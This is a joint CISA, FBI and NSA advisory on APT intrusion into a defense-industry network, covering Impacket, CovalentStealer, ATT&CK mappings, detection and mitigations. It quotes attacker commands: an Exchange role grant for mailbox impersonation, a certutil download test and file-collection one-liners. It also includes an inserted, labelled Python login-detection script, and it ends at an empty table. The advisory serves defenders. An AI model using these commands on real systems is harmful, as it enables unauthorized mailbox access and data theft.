"### Summary\n\nActions to Help Protect Against APT Cyber Activity:\n\n\u2022 Enforce multifactor authentication (MFA) on all user accounts. \n\u2022 Implement network segmentation to separate network segments based on role and functionality. \n\u2022 Update software, including operating systems, applications, and firmware, on network assets. \n\u2022 Audit account usage.\n\nFrom November 2021 through January 2022, the Cybersecurity and Infrastructure Security Agency (CISA) responded to advanced persistent threat (APT) activity on a Defense Industrial Base (DIB) Sector organization\u2019s enterprise network. During incident response activities, CISA uncovered that likely multiple APT groups compromised the organization\u2019s network, and some APT actors had long-term access to the environment. APT actors used an open-source toolkit called Impacket to gain their foothold within the environment and further compromise the network, and also used a custom data exfiltration tool, CovalentStealer, to steal the victim\u2019s sensitive data.\n\nThis joint Cybersecurity Advisory (CSA) provides the APT actors' tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) identified during the incident response activities by CISA and a third-party incident response organization. The CSA includes detection and mitigation actions to help organizations detect and prevent related APT activity. 
CISA, the Federal Bureau of Investigation (FBI), and the National Security Agency (NSA) recommend DIB sector and other critical infrastructure organizations implement the mitigations in this CSA to ensure they are managing and reducing the impact of cyber threats to their networks.\n\nDownload the PDF version of this report: pdf, 692 KB\n\nFor a downloadable copy of IOCs, see the following files:\n\n * [Malware Analysis Report (MAR)-10365227-1.stix, 966 kb](<https://www.cisa.gov/uscert/sites/default/files/publications/MAR-10365227.r1.v1.WHITE_stix_7.xml>)\n * [MAR-10365227-2.stix, 249B](<https://www.cisa.gov/uscert/sites/default/files/publications/MAR-10365227.r2.v1.WHITE_stix.xml>)\n * [MAR-10365227-3.stix, 3.2 MB](<https://www.cisa.gov/uscert/sites/default/files/publications/MAR-10365227.r3.v1.WHITE_stix_0.xml>)\n\n### Technical Details\n\n#### **Threat Actor Activity**\n\n**Note**: _This advisory uses the [MITRE ATT&CK\u00ae for Enterprise](<https://attack.mitre.org/versions/v11/matrices/enterprise/>) framework, version 11. See the MITRE ATT&CK Tactics and Techniques section for a table of the APT cyber activity mapped to MITRE ATT&CK for Enterprise framework._\n\nFrom November 2021 through January 2022, CISA conducted an incident response engagement on a DIB Sector organization\u2019s enterprise network. The victim organization also engaged a third-party incident response organization for assistance. During incident response activities, CISA and the trusted third party identified APT activity on the victim\u2019s network.\n\nSome APT actors gained initial access to the organization\u2019s Microsoft Exchange Server as early as mid-January 2021. The initial access vector is unknown. Based on log analysis, the actors gathered information about the Exchange environment and performed mailbox searches within a four-hour period after gaining access. 
In the same period, these actors used a compromised administrator account (“Admin 1”) to access the Exchange Web Services (EWS) Application Programming Interface (API). In early February 2021, the actors returned to the network and used Admin 1 to access the EWS API again. In both instances, the actors used a virtual private network (VPN).

Four days later, the APT actors used Windows Command Shell over a three-day period to interact with the victim’s network. The actors used Command Shell to learn about the organization’s environment and to collect sensitive data, including sensitive contract-related information from shared drives, for eventual exfiltration. The actors manually collected files using the command-line tool WinRAR. These files were split into approximately 3 MB chunks located on the Microsoft Exchange server within the `CU2\he\debug` directory. See Appendix: Windows Command Shell Activity for additional information, including specific commands used.

During the same period, APT actors implanted [Impacket](<https://attack.mitre.org/versions/v11/software/S0357/>), a Python toolkit for programmatically constructing and manipulating network protocols, on another system. The actors used Impacket to attempt to move laterally to another system.

In early March 2021, APT actors exploited CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 to install 17 China Chopper webshells on the Exchange Server. Later in March, APT actors installed HyperBro on the Exchange Server and two other systems. For more information on the HyperBro and webshell samples, see CISA [MAR-10365227-2](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277b>) and [-3](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277c>).

In April 2021, APT actors used Impacket for network exploitation activities. See the Use of Impacket section for additional information.
From late July through mid-October 2021, APT actors employed a custom exfiltration tool, CovalentStealer, to exfiltrate the remaining sensitive files. See the Use of Custom Exfiltration Tool: CovalentStealer section for additional information.

APT actors maintained access through mid-January 2022, likely by relying on legitimate credentials.

#### **Use of Impacket**

CISA discovered activity indicating the use of two Impacket tools: wmiexec.py and smbexec.py. These tools use Windows Management Instrumentation (WMI) and the Server Message Block (SMB) protocol, respectively, to create a semi-interactive shell with the target device. Through the Command Shell, an Impacket user with credentials can run commands on the remote device using the Windows management protocols required to support an enterprise network.

The APT cyber actors used existing, compromised credentials with Impacket to access a higher-privileged service account used by the organization's multifunctional devices. The threat actors first used the service account to remotely access the organization’s Microsoft Exchange server via Outlook Web Access (OWA) from multiple external IP addresses; shortly afterwards, the actors assigned the ApplicationImpersonation role to the service account by running the following PowerShell command for managing Exchange:

```powershell
powershell add-pssnapin *exchange*;New-ManagementRoleAssignment -Name:"Journaling-Logs" -Role:ApplicationImpersonation -User:<account>
```

This command gave the service account the ability to access other users’ mailboxes.

The APT cyber actors used virtual private network (VPN) and virtual private server (VPS) providers, M247 and SurfShark, as part of their techniques to remotely access the Microsoft Exchange server. Use of these hosting providers, which serve to conceal interaction with victim networks, is common for these threat actors.
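The remote-access pattern described here (a service account used from hosting-provider addresses, later granted an impersonation role) is what the login-review steps in the Detection section below look for. As an added example, not CISA's code, the following Python applies those checks (hosting-provider source, impossible travel, one IP across several accounts, changing user agents) to constructed login records; the ASN and geolocation fields, account names and speed/count thresholds are assumptions.

```python
"""Login-log review for the remote-access pattern in this advisory.

Added example (not CISA code). It applies the Detection section's checks to
constructed login records:
  * logins sourced from the VPS/VPN providers named in the advisory (M247, SurfShark)
  * "impossible travel" for one account between two consecutive logins
  * one source IP used across several accounts
  * changing user-agent strings for one account ("impossible logins")
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime
from math import asin, cos, radians, sin, sqrt


@dataclass
class Login:
    ts: datetime
    user: str
    src_ip: str
    asn_org: str      # assumed: organisation name from an IP-to-ASN enrichment
    user_agent: str
    lat: float        # assumed: geo-IP enrichment of src_ip
    lon: float


HOSTING_PROVIDERS = ("m247", "surfshark")  # providers named in the advisory
MAX_SPEED_KMH = 900.0                       # assumed: faster than this is "impossible travel"
SHARED_IP_MIN_ACCOUNTS = 3                  # assumed: distinct accounts per IP before flagging


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres between two points."""
    p1, p2 = radians(lat1), radians(lat2)
    a = sin(radians(lat2 - lat1) / 2) ** 2 + cos(p1) * cos(p2) * sin(radians(lon2 - lon1) / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))


def hosting_provider_logins(logins):
    """Logins whose source ASN belongs to a hosting/VPN provider of interest."""
    return [l for l in logins if any(p in l.asn_org.lower() for p in HOSTING_PROVIDERS)]


def impossible_travel(logins):
    """Consecutive logins of one account that imply an unrealistic travel speed."""
    by_user = defaultdict(list)
    for l in logins:
        by_user[l.user].append(l)
    hits = []
    for user, entries in by_user.items():
        entries.sort(key=lambda l: l.ts)
        for a, b in zip(entries, entries[1:]):
            hours = max((b.ts - a.ts).total_seconds() / 3600, 1 / 3600)  # floor at one second
            km = haversine_km(a.lat, a.lon, b.lat, b.lon)
            if km / hours > MAX_SPEED_KMH:
                hits.append({"user": user, "from": a.src_ip, "to": b.src_ip,
                             "km": round(km), "hours": round(hours, 2)})
    return hits


def shared_source_ips(logins, min_accounts=SHARED_IP_MIN_ACCOUNTS):
    """Source IPs used by several distinct accounts (review against known office egress)."""
    users = defaultdict(set)
    for l in logins:
        users[l.src_ip].add(l.user)
    return {ip: sorted(u) for ip, u in users.items() if len(u) >= min_accounts}


def user_agent_changes(logins):
    """Accounts that authenticated with more than one user-agent string."""
    agents = defaultdict(set)
    for l in logins:
        agents[l.user].add(l.user_agent)
    return {u: sorted(a) for u, a in agents.items() if len(a) > 1}


# Constructed sample: a multifunction-device service account and two other
# accounts appear from one M247 address; the same service account then logs in
# an hour later from a SurfShark address on another continent with a new client.
UA_BROWSER = "Mozilla/5.0 (Windows NT 10.0) Chrome/90.0"
UA_SCRIPT = "python-requests/2.25.1"
SAMPLE_LOGINS = [
    Login(datetime(2021, 4, 1, 8, 0), "svc-mfd", "203.0.113.10", "M247 Ltd", UA_BROWSER, 51.5074, -0.1278),
    Login(datetime(2021, 4, 1, 8, 5), "former-employee", "203.0.113.10", "M247 Ltd", UA_BROWSER, 51.5074, -0.1278),
    Login(datetime(2021, 4, 1, 8, 10), "admin1", "203.0.113.10", "M247 Ltd", UA_BROWSER, 51.5074, -0.1278),
    Login(datetime(2021, 4, 1, 9, 0), "svc-mfd", "198.51.100.7", "Surfshark Ltd", UA_SCRIPT, 40.7128, -74.0060),
    Login(datetime(2021, 4, 1, 8, 30), "alice", "192.0.2.5", "ExampleCorp", UA_BROWSER, 38.9072, -77.0369),
    Login(datetime(2021, 4, 1, 8, 35), "bob", "192.0.2.5", "ExampleCorp", UA_BROWSER, 38.9072, -77.0369),
]

if __name__ == "__main__":
    print("hosting-provider logins:", [(l.user, l.src_ip) for l in hosting_provider_logins(SAMPLE_LOGINS)])
    print("impossible travel:", impossible_travel(SAMPLE_LOGINS))
    print("shared source IPs:", shared_source_ips(SAMPLE_LOGINS))
    print("user-agent changes:", user_agent_changes(SAMPLE_LOGINS))
```

The office address 192.0.2.5 is deliberately below the shared-IP threshold; in practice the expected egress ranges named in the Detection section are excluded before this check rather than by a count alone.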
According to CISA’s analysis of the victim’s Microsoft Exchange server Internet Information Services (IIS) logs, the actors used the account of a former employee to access EWS. EWS enables access to mailbox items such as email messages, meetings, and contacts. The source IP address for these connections is mostly from the VPS hosting provider, M247.

#### Use of Custom Exfiltration Tool: CovalentStealer

The threat actors employed a custom exfiltration tool, CovalentStealer, to exfiltrate sensitive files.

CovalentStealer is designed to identify file shares on a system, categorize the files, and upload the files to a remote server. CovalentStealer includes two configurations that specifically target the victim's documents using predetermined file paths and user credentials. CovalentStealer stores the collected files in a Microsoft OneDrive cloud folder, includes a configuration file to specify the types of files to collect at specified times, and uses a 256-bit AES key for encryption. See CISA [MAR-10365227-1](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277a>) for additional technical details, including IOCs and detection signatures.

#### MITRE ATT&CK Tactics and Techniques

MITRE ATT&CK is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. CISA uses the ATT&CK Framework as a foundation for the development of specific threat models and methodologies. Table 1 lists the ATT&CK techniques employed by the APT actors.

_Table 1: Identified APT Enterprise ATT&CK Tactics and Techniques_

_Initial Access_

| Technique Title | ID | Use |
|---|---|---|
| Valid Accounts | [T1078](<https://attack.mitre.org/versions/v11/techniques/T1078/>) | Actors obtained and abused credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. In this case, they exploited an organization’s multifunctional device domain account used to access the organization’s Microsoft Exchange server via OWA. |

_Execution_

| Technique Title | ID | Use |
|---|---|---|
| Windows Management Instrumentation | [T1047](<https://attack.mitre.org/versions/v11/techniques/T1047/>) | Actors used Impacket tools wmiexec.py and smbexec.py to leverage Windows Management Instrumentation and execute malicious commands. |
| Command and Scripting Interpreter | [T1059](<https://attack.mitre.org/versions/v11/techniques/T1059/003/>) | Actors abused command and script interpreters to execute commands. |
| Command and Scripting Interpreter: PowerShell | [T1059.001](<https://attack.mitre.org/techniques/T1059/001>) | Actors abused PowerShell commands and scripts to map shared drives by specifying a path to one location and retrieving the items from another. See Appendix: Windows Command Shell Activity for additional information. |
| Command and Scripting Interpreter: Windows Command Shell | [T1059.003](<https://attack.mitre.org/versions/v11/techniques/T1059/003/>) | Actors abused the Windows Command Shell to learn about the organization’s environment and to collect sensitive data. See Appendix: Windows Command Shell Activity for additional information, including specific commands used. The actors used Impacket tools, which enable a user with credentials to run commands on the remote device through the Command Shell. |
| Command and Scripting Interpreter: Python | [T1059.006](<https://attack.mitre.org/versions/v11/techniques/T1059/006/>) | The actors used two Impacket tools: wmiexec.py and smbexec.py. |
| Shared Modules | [T1129](<https://attack.mitre.org/techniques/T1129>) | Actors executed malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. |
| System Services | [T1569](<https://attack.mitre.org/versions/v11/techniques/T1569/>) | Actors abused system services to execute commands or programs on the victim’s network. |

_Persistence_

| Technique Title | ID | Use |
|---|---|---|
| Valid Accounts | [T1078](<https://attack.mitre.org/versions/v11/techniques/T1078/>) | Actors obtained and abused credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. |
| Create or Modify System Process | [T1543](<https://attack.mitre.org/versions/v11/techniques/T1543/>) | Actors were observed creating or modifying system processes. |

_Privilege Escalation_

| Technique Title | ID | Use |
|---|---|---|
| Valid Accounts | [T1078](<https://attack.mitre.org/versions/v11/techniques/T1078/>) | Actors obtained and abused credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. In this case, they exploited an organization’s multifunctional device domain account used to access the organization’s Microsoft Exchange server via OWA. |

_Defense Evasion_

| Technique Title | ID | Use |
|---|---|---|
| Masquerading: Match Legitimate Name or Location | [T1036.005](<https://attack.mitre.org/versions/v11/techniques/T1036/005>) | Actors masqueraded the archive utility WinRAR.exe by renaming it VMware.exe to evade defenses and observation. |
| Indicator Removal on Host | [T1070](<https://attack.mitre.org/versions/v11/techniques/T1070/004/>) | Actors deleted or modified artifacts generated on a host system to remove evidence of their presence or hinder defenses. |
| Indicator Removal on Host: File Deletion | [T1070.004](<https://attack.mitre.org/versions/v11/techniques/T1070/004/>) | Actors used the del.exe command with the /f parameter to force the deletion of read-only files with the `*.rar` and `tempg*` wildcards. |
| Valid Accounts | [T1078](<https://attack.mitre.org/versions/v11/techniques/T1078/>) | Actors obtained and abused credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. In this case, they exploited an organization’s multifunctional device domain account used to access the organization’s Microsoft Exchange server via OWA. |
| Virtualization/Sandbox Evasion: System Checks | [T1497.001](<https://attack.mitre.org/techniques/T1497/001>) | Actors used Windows command shell commands to detect and avoid virtualization and analysis environments. See Appendix: Windows Command Shell Activity for additional information. |
| Impair Defenses: Disable or Modify Tools | [T1562.001](<https://attack.mitre.org/techniques/T1562/001>) | Actors used the taskkill command, probably to disable security features. CISA was unable to determine which application was associated with the Process ID. |
| Hijack Execution Flow | [T1574](<https://attack.mitre.org/versions/v11/techniques/T1574/>) | Actors were observed hijacking execution flow. |

_Discovery_

| Technique Title | ID | Use |
|---|---|---|
| System Network Configuration Discovery | [T1016](<https://attack.mitre.org/techniques/T1016>) | Actors used the systeminfo command to look for details about the network configurations and settings and determine if the system was a VMware virtual machine. The threat actor used route print to display the entries in the local IP routing table. |
| System Network Configuration Discovery: Internet Connection Discovery | [T1016.001](<https://attack.mitre.org/techniques/T1016/001>) | Actors checked for internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways. |
| System Owner/User Discovery | [T1033](<https://attack.mitre.org/techniques/T1033>) | Actors attempted to identify the primary user, currently logged in user, set of users that commonly use a system, or whether a user is actively using the system. |
| System Network Connections Discovery | [T1049](<https://attack.mitre.org/techniques/T1049>) | Actors used the netstat command to display TCP connections, prevent hostname determination of foreign IP addresses, and specify the protocol for TCP. |
| Process Discovery | [T1057](<https://attack.mitre.org/techniques/T1057>) | Actors used the tasklist command to get information about running processes on a system and determine if the system was a VMware virtual machine. The actors used tasklist.exe and find.exe to display a list of applications and services with their PIDs for all tasks running on the computer matching the string “powers.” |
| System Information Discovery | [T1082](<https://attack.mitre.org/techniques/T1082>) | Actors used the ipconfig command to get detailed information about the operating system and hardware and determine if the system was a VMware virtual machine. |
| File and Directory Discovery | [T1083](<https://attack.mitre.org/techniques/T1083>) | Actors enumerated files and directories or may search in specific locations of a host or network share for certain information within a file system. |
| Virtualization/Sandbox Evasion: System Checks | [T1497.001](<https://attack.mitre.org/techniques/T1497/001>) | Actors used Windows command shell commands to detect and avoid virtualization and analysis environments. |

_Lateral Movement_

| Technique Title | ID | Use |
|---|---|---|
| Remote Services: SMB/Windows Admin Shares | [T1021.002](<https://attack.mitre.org/techniques/T1021/002>) | Actors used Valid Accounts to interact with a remote network share using Server Message Block (SMB) and then perform actions as the logged-on user. |

_Collection_

| Technique Title | ID | Use |
|---|---|---|
| Archive Collected Data: Archive via Utility | [T1560.001](<https://attack.mitre.org/techniques/T1560>) | Actors used PowerShell commands and WinRAR to compress and/or encrypt collected data prior to exfiltration. |
| Data from Network Shared Drive | [T1039](<https://attack.mitre.org/versions/v11/techniques/T1039/>) | Actors likely used the net share command to display information about shared resources on the local computer and decide which directories to exploit, the PowerShell dir command to map shared drives to a specified path and retrieve items from another, and the ntfsinfo command to search network shares on computers they had compromised to find files of interest. The actors used dir.exe to display a list of a directory's files and subdirectories matching a certain text string. |
| Data Staged: Remote Data Staging | [T1074.002](<https://attack.mitre.org/versions/v11/techniques/T1074/002/>) | The actors split collected files into approximately 3 MB chunks located on the Exchange server within the `CU2\he\debug` directory. |

_Command and Control_

| Technique Title | ID | Use |
|---|---|---|
| Non-Application Layer Protocol | [T1095](<https://attack.mitre.org/techniques/T1095>) | Actors used a non-application layer protocol for communication between host and Command and Control (C2) server or among infected hosts within a network. |
| Ingress Tool Transfer | [T1105](<https://attack.mitre.org/versions/v11/techniques/T1105/>) | Actors used the certutil command with three switches to test if they could download files from the internet. The actors employed CovalentStealer to exfiltrate the files. |
| Proxy | [T1090](<https://attack.mitre.org/versions/v11/techniques/T1090/>) | Actors are known to use VPN and VPS providers, namely M247 and SurfShark, as part of their techniques to access a network remotely. |

_Exfiltration_

| Technique Title | ID | Use |
|---|---|---|
| Schedule Transfer | [T1029](<https://attack.mitre.org/versions/v11/techniques/T1029/>) | Actors scheduled data exfiltration to be performed only at certain times of day or at certain intervals and blend traffic patterns with normal activity. |
| Exfiltration Over Web Service: Exfiltration to Cloud Storage | [T1567.002](<https://attack.mitre.org/techniques/T1567/002>) | The actor's CovalentStealer tool stores collected files in a Microsoft OneDrive cloud folder. |

### DETECTION

Given the actors’ demonstrated capability to maintain persistent, long-term access in compromised enterprise environments, CISA, FBI, and NSA encourage organizations to:

 * Monitor logs for connections from unusual VPSs and VPNs. Examine connection logs for access from unexpected ranges, particularly from machines hosted by SurfShark and M247.
 * Monitor for suspicious account use (e.g., inappropriate or unauthorized use of administrator accounts, service accounts, or third-party accounts).
To detect use of compromised credentials in combination with a VPS, follow the steps below:
   * Review logs for "impossible logins," such as logins with changing username, user agent string, and IP address combinations, or logins where IP addresses do not align with the expected user’s geographic location.
   * Search for "impossible travel," which occurs when a user logs in from multiple IP addresses that are a significant geographic distance apart (i.e., a person could not realistically travel between the geographic locations of the two IP addresses in the time between logins). Note: This detection opportunity can result in false positives if legitimate users apply VPN solutions before connecting to networks.
   * Search for one IP used across multiple accounts, excluding expected logins.
   * Take note of any M247-associated IP addresses used along with VPN providers (e.g., SurfShark). Look for successful remote logins (e.g., VPN, OWA) from M247-hosted or SurfShark-registered IP addresses.
   * Identify suspicious privileged account use after resetting passwords or applying user account mitigations.
   * Search for unusual activity in typically dormant accounts.
   * Search for unusual user agent strings, such as strings not typically associated with normal user activity, which may indicate bot activity.
 * Review the YARA rules provided in MAR-10365227-1 to assist in determining whether malicious activity has been observed.
 * Monitor for the installation of unauthorized software, including Remote Server Administration Tools (e.g., psexec, RdClient, VNC, and ScreenConnect).
 * Monitor for anomalous and known malicious command-line use. See Appendix: Windows Command Shell Activity for commands used by the actors to interact with the victim’s environment.
 * Monitor for unauthorized changes to user accounts (e.g., creation, permission changes, and enabling a previously disabled account).

### CONTAINMENT AND REMEDIATION

Organizations affected by active or recently active threat actors in their environment can take the following initial steps to aid in eviction efforts and prevent re-entry:

 * Report the incident. Report the incident to U.S. Government authorities and follow your organization’s incident response plan.
   * Report incidents to CISA via CISA’s 24/7 Operations Center ([report@cisa.gov](<mailto:report@cisa.gov>) or 888-282-0870).
   * Report incidents to your local FBI field office at [fbi.gov/contact-us/field-offices](<http://www.fbi.gov/contact-us/field>) or to FBI’s 24/7 Cyber Watch (CyWatch) via (855) 292-3937 or [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>).
   * For DIB incident reporting, contact the Defense Cyber Crime Center (DC3) via DIBNET at [dibnet.dod.mil/portal/intranet](<https://dibnet.dod.mil/portal/intranet>) or (410) 981 0104.
 * Reset all login accounts. Reset all accounts used for authentication since it is possible that the threat actors have additional stolen credentials. Password resets should also include accounts outside of Microsoft Active Directory, such as network infrastructure devices and other non-domain-joined devices (e.g., IoT devices).
 * Monitor SIEM logs and build detections. Create signatures based on the threat actor TTPs and use these signatures to monitor security logs for any signs of threat actor re-entry.
 * Enforce MFA on all user accounts. Enforce phishing-resistant MFA on all accounts without exception to the greatest extent possible.
 * Follow Microsoft’s security guidance for Active Directory—[Best Practices for Securing Active Directory](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/best-practices-for-securing-active-directory>).
 * Audit accounts and permissions. Audit all accounts to ensure all unused accounts are disabled or removed and active accounts do not have excessive privileges. Monitor SIEM logs for any changes to accounts, such as permission changes or enabling a previously disabled account, as this might indicate a threat actor using these accounts.
 * Harden and monitor PowerShell by reviewing guidance in the joint Cybersecurity Information Sheet—[Keeping PowerShell: Security Measures to Use and Embrace](<https://media.defense.gov/2022/Jun/22/2003021689/-1/-1/1/CSI_KEEPING_POWERSHELL_SECURITY_MEASURES_TO_USE_AND_EMBRACE_20220622.PDF>).

### Mitigations

Mitigation recommendations are usually longer-term efforts that take place before a compromise as part of risk management efforts, or after the threat actors have been evicted from the environment and the immediate response actions are complete. While some may be tailored to the TTPs used by the threat actor, recovery recommendations are largely general best practices and industry standards aimed at bolstering overall cybersecurity posture.

### Segment Networks Based on Function

 * **Implement network segmentation to separate network segments based on role and functionality**. Proper network segmentation significantly reduces the ability of ransomware and other threat actors to move laterally by controlling traffic flows between—and access to—various subnetworks. (See CISA’s Infographic on Layering Network Security Through Segmentation and NSA’s [Segment Networks and Deploy Application-Aware Defenses](<https://media.defense.gov/2019/Sep/09/2002180325/-1/-1/0/Segment%20Networks%20and%20Deploy%20Application%20Aware%20Defenses%20-%20Copy.pdf>).)
 * **Isolate similar systems and implement micro-segmentation with granular access and policy restrictions** to modernize cybersecurity and adopt Zero Trust (ZT) principles for both network perimeter and internal devices. Logical and physical segmentation are critical to limiting and preventing lateral movement, privilege escalation, and exfiltration.

### Manage Vulnerabilities and Configurations

 * **Update software, including operating systems, applications, and firmware, on network assets**. Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) and critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment.
 * **Implement a configuration change control process** that securely creates device configuration backups to detect unauthorized modifications. When a configuration change is needed, document the change, and include the authorization, purpose, and mission justification. Periodically verify that unauthorized modifications have not been applied by comparing current device configurations with the most recent backups. If suspicious changes are observed, verify the change was authorized.

### Search for Anomalous Behavior

 * **Use cybersecurity visibility and analytics tools** to improve detection of anomalous behavior and enable dynamic changes to policy and other response actions. Visibility tools include network monitoring tools and host-based logs and monitoring tools, such as an endpoint detection and response (EDR) tool. EDR tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.
 * **Monitor the use of scripting languages** (e.g., Python, PowerShell) by authorized and unauthorized users. Anomalous use by either group may be indicative of malicious activity, intentional or otherwise.

### Restrict and Secure Use of Remote Admin Tools

 * **Limit the number of remote access tools as well as who and what can be accessed using them**. Reducing the number of remote admin tools and their allowed access will increase visibility of unauthorized use of these tools.
 * **Use encrypted services to protect network communications and disable all clear text administration services** (e.g., Telnet, HTTP, FTP, SNMP 1/2c). This ensures that sensitive information cannot be easily obtained by a threat actor capturing network traffic.

### Implement a Mandatory Access Control Model

 * **Implement stringent access controls to sensitive data and resources**. Access should be restricted to those users who require access and to the minimal level of access needed.

### Audit Account Usage

 * **Monitor VPN logins to look for suspicious access** (e.g., logins from unusual geo locations, remote logins from accounts not normally used for remote access, concurrent logins for the same account from different locations, unusual times of the day).
 * **Closely monitor the use of administrative accounts**. Admin accounts should be used sparingly and only when necessary, such as installing new software or patches. Any use of admin accounts should be reviewed to determine if the activity is legitimate.
 * **Ensure standard user accounts do not have elevated privileges**. Any attempt to increase permissions on standard user accounts should be investigated as a potential compromise.

### VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA, FBI, and NSA recommend exercising, testing, and validating your organization's security program against threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA, FBI, and NSA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

 1. Select an ATT&CK technique described in this advisory (see Table 1).
 2. Align your security technologies against the technique.
 3. Test your technologies against the technique.
 4. Analyze the performance of your detection and prevention technologies.
 5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
 6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA, FBI, and NSA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

### RESOURCES

CISA offers several no-cost scanning and testing services to help organizations reduce their exposure to threats by taking a proactive approach to mitigating attack vectors. See [cisa.gov/cyber-hygiene-services](<https://www.cisa.gov/cyber-hygiene-services>).

U.S.
DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System (PDNS) services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email [dib_defense@cyber.nsa.gov](<mailto:dib_defense@cyber.nsa.gov>).

### ACKNOWLEDGEMENTS

CISA, FBI, and NSA acknowledge Mandiant for its contributions to this CSA.

### APPENDIX: WINDOWS COMMAND SHELL ACTIVITY

Over a three-day period in February 2021, APT cyber actors used Windows Command Shell to interact with the victim’s environment. When interacting with the victim’s system and executing commands, the threat actors used the /q and /c parameters to turn echo off, carry out the command specified by a string, and stop its execution once completed.

On the first day, the threat actors consecutively executed many commands within the Windows Command Shell to learn about the organization’s environment and to collect sensitive data for eventual exfiltration (see Table 2).

_Table 2: Windows Command Shell Activity (Day 1)_

| Command | Description / Use |
|---|---|
| net share | Used to create, configure, and delete network shares from the command line.[[1](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/hh750728\(v=ws.11\)>)] The threat actor likely used this command to display information about shared resources on the local computer and decide which directories to exploit. |
| powershell dir | An alias (shorthand) for the PowerShell Get-ChildItem cmdlet. This command maps shared drives by specifying a path to one location and retrieving the items from another.[[2](<https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-childitem?view=powershell-7.2>)] The threat actor added additional switches (aka options, parameters, or flags) to form a “one liner,” a term for a chain of commonly used commands used in exploitation: `powershell dir -recurse -path e:\<redacted>\|select fullname,length\|export-csv c:\windows\temp\temp.txt`. This particular command lists subdirectories of the target environment. |
| systeminfo, tasklist, ipconfig | systeminfo displays detailed configuration information [[3](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo>)], tasklist lists currently running processes [[4](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/tasklist>)], and ipconfig displays all current Transmission Control Protocol (TCP)/IP network configuration values and refreshes Dynamic Host Configuration Protocol (DHCP) and Domain Name System (DNS) settings, respectively [[5](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ipconfig>)]. The threat actor used these commands with specific switches to determine if the system was a VMware virtual machine: `systeminfo > vmware & date /T`, `tasklist /v > vmware & date /T`, and `ipconfig /all >> vmware & date /`. |
| route print | Used to display and modify the entries in the local IP routing table.[[6](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961510\(v=ws.11\)>)] The threat actor used this command to display the entries in the local IP routing table. |
| netstat | Used to display active TCP connections, ports on which the computer is listening, Ethernet statistics, the IP routing table, IPv4 statistics, and IPv6 statistics.[[7](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/netstat>)] The threat actor used this command with three switches to display TCP connections, prevent hostname determination of foreign IP addresses, and specify the protocol for TCP: `netstat -anp tcp`. |
| certutil | Used to dump and display certification authority (CA) configuration information, configure Certificate Services, back up and restore CA components, and verify certificates, key pairs, and certificate chains.[[8](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil>)] The threat actor used this command with three switches to test if they could download files from the internet: `certutil -urlcache -split -f https://microsoft.com temp.html`. |
| ping | Sends Internet Control Message Protocol (ICMP) echoes to verify connectivity to another TCP/IP computer.[[9](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ping>)] The threat actor used `ping -n 2 apple.com` either to test their internet connection or to detect and avoid virtualization and analysis environments or network restrictions. |
| taskkill | Used to end tasks or processes.[[10](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/taskkill>)] The threat actor used `taskkill /F /PID 8952`, probably to disable security features. CISA was unable to determine what this process was, as process identifier (PID) numbers are dynamic. |
| PowerShell Compress-Archive cmdlet | Used to create a compressed archive or to zip files from specified files and directories.[[11](<https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.archive/compress-archive?view=powershell-7.2>)] The threat actor used parameters indicating shared drives as file and folder sources and the destination archive as zipped files. Specifically, they collected sensitive contract-related information from the shared drives. |

On the second day, the APT cyber actors executed the commands in Table 3 to perform discovery as well as collect and archive data.

_Table 3: Windows Command Shell Activity (Day 2)_

| Command | Description / Use |
|---|---|
| ntfsinfo.exe | Used to obtain volume information from the New Technology File System (NTFS) and to print it along with a directory dump of NTFS metadata files.[[12](<https://docs.microsoft.com/en-us/sysinternals/downloads/ntfsinfo>)] |
| WinRAR.exe | Used to compress files; the actors subsequently masqueraded WinRAR.exe by renaming it VMware.exe.[[13](<https://www.rarlab.com/>)] |

On the third day, the APT cyber actors returned to the organization’s network and executed the commands in Table 4.

_Table 4: Windows Command Shell Activity (Day 3)_

| Command | Description / Use |
|---|---|
